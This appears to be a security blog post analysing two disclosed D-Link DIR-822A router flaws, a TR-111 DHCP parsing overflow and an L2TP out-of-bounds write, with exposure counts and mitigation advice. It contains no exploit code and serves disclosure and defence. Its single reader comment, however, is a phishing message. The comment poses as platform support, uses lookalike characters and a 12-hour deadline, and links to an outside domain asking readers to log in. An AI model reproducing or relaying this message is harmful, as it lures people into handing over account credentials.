Auditing the D-Link DIR-822A Flaws: TR-111 Parsing and L2TP Control Messages
Vulnerability overview
Two critical vulnerabilities in the D-Link DIR-822A were disclosed with proof-of-concept code. CVE-2026-86296 is a stack-based buffer overflow in the DHCP daemon's TR-111 option parsing, rated 10.0. CVE-2026-86510 is an out-of-bounds write in L2TP control message handling, rated 9.9. Both affect firmware version A_101.
Mechanism and exploitation conditions
TR-111 defines a mechanism for passing vendor-specific configuration through DHCP. On the DIR-822A, the code that parses option 125 subfields reads a length-delimited binary field and then applies string semantics to it. The strcpy call that follows copies until it reaches a null byte, and the attacker controls where that byte appears. A payload that fills or exceeds the 256-byte destination overwrites the stack frame.
The L2TP flaw is in the function that populates tunnel parameters from a control message. Control messages carry variable-length attribute fields, and the parser writes them into a fixed structure without confirming they fit. An attacker who can send L2TP control packets to the device triggers the out-of-bounds write.
Impact
Both flaws corrupt memory in privileged daemons. The DHCP overflow can crash the address assignment service or hand the attacker execution in the router's runtime. The L2TP write produces the same class of outcome through a different entry point. On a device that sits at the network boundary, either result gives an attacker a position to observe traffic, alter routing, or establish persistence.
Affected products and scope
The reported affected product is the D-Link DIR-822A with firmware A_101. D-Link has not published a complete affected scope; the vendor stated that it is reviewing the reported vulnerability, affected product scope, and remediation options. Researchers have not confirmed exploitation in the wild.
Exposure context
ZoomEye finds 65,758 assets matching app="D-Link Router" and 623 matching title="DIR-822". The broad query reflects how many D-Link router assets carry that fingerprint. The narrow query reflects how many announce the DIR-822 model in their page title. Neither confirms a firmware version or an open L2TP service, so the numbers bound the candidate set rather than the vulnerable set.
Remediation and mitigations
No firmware fix exists yet. Reduce the attack surface: disable L2TP if it is not required, keep remote administration off external interfaces, and restrict which clients can reach the device's service ports. Segment the router from untrusted networks and monitor D-Link's security page for a patched release. If no fix arrives, plan to replace the hardware.
References
- SecurityOnline, "D-Link DIR-822A Vulnerabilities Details and PoC Disclosed", https://securityonline.info/d-link-dir-822a-vulnerabilities-poc/
- ZoomEye exposure query
app="D-Link Router", 65,758 assets, and filtertitle="DIR-822", 623 assets, recorded 2026-09-22.
Top comments (1)
Dear User,
Due to an increasе in bоt aсtіvіty on thе рlatfоrm, we rеquirе verіfу of your account.
Please log in vіa the lіnk below:
• anti-bot.icu/5K0N5G7M9C4
Verificated dеadlinе - 12 hours.
Sincerely,Dev Support